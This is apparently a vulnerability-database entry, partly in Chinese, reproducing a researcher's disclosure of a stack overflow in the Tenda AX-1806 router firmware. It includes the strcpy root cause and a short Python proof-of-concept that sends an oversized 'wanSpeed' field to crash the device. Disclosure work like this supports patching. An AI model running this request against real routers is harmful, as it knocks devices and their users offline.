# N/A
## 概述
Tenda AX-1806 v1.0.0.1 存在一个栈溢出漏洞,位于 `sub_65B5C` 函数处理 `wanSpeed` 参数的过程中。
## 影响版本
Tenda AX-1806 v1.0.0.1
## 细节
攻击者可通过构造恶意请求,利用 `sub_65B5C` 函数中对 `wanSpeed` 参数的不当处理触发栈溢出。
## 影响
可导致拒绝服务(DoS),设备可能崩溃或无法正常响应。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: VulnbyCola/Tenda/AX-1806/9/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接
标签:
神龙速读:
## Tenda AX-1806 Vulnerability
- **Vendor**: Tenda
- **Product**: AX-1806
- **Version**: v1.0.0.1 ([Link to download](https://www.tenda.com.cn/download/detail-3421.html))
- **Vulnerability Type**: Stack Overflow
- **Author**: Chuanhao Wan
- **Email**: chuanhaowan@hust.edu.cn
- **Institution**: Huazhong University of Science and Technology (HUST)
### Vulnerability Cause
A stack overflow vulnerability exists in the `sub_65B5C` function. The `wanSpeed` value is obtained from user-controlled input and copied into a fixed-size stack buffer (`v11[32]`) using `strcpy()`, which does not perform bounds checking. An attacker can supply an excessively long value for `wanSpeed`, causing a stack-based buffer overflow and resulting in a Denial of Service (DoS).
```c
v2 = (const char *)sub_295C8(a1, "wanSpeed", "0");
strcpy(v11, v2);
```
### Proof of Concept (PoC)
To reproduce the vulnerability:
1. Boot the firmware using QEMU or another method.
2. Execute the following Python script for PoC attacks:
```python
import requests
url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
wanSpeed = "A"*7000
data = {
"wanSpeed": wanSpeed
}
r = requests.post(url, data=data)
print(r.status_code, r.text)
```
### Result
The target router crashes and cannot provide services correctly and persistently, as shown in the provided screenshots.
暂无评论